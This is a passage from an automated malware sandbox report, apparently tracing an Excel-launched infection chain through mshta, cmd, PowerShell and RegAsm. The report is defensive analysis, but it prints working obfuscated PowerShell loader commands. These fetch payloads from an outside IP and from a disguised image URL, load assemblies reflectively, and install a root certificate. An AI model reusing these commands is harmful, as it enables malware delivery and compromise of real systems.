= [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,28_2_0041CBE1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899B022D push eax; iretd 7_2_000007FE899B0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899B00BD pushad ; iretd 7_2_000007FE899B00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899D022D push eax; iretd 14_2_000007FE899D0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899D00BD pushad ; iretd 14_2_000007FE899D00C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004470B7 push eax; retf 0046h28_2_004470B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00457186 push ecx; ret 28_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0045E55D push esi; ret 28_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00457AA8 push eax; ret 28_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434EB6 push ecx; ret 28_2_00434EC9

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00406EEB ShellExecuteW,URLDownloadToFileW,28_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,28_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,28_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
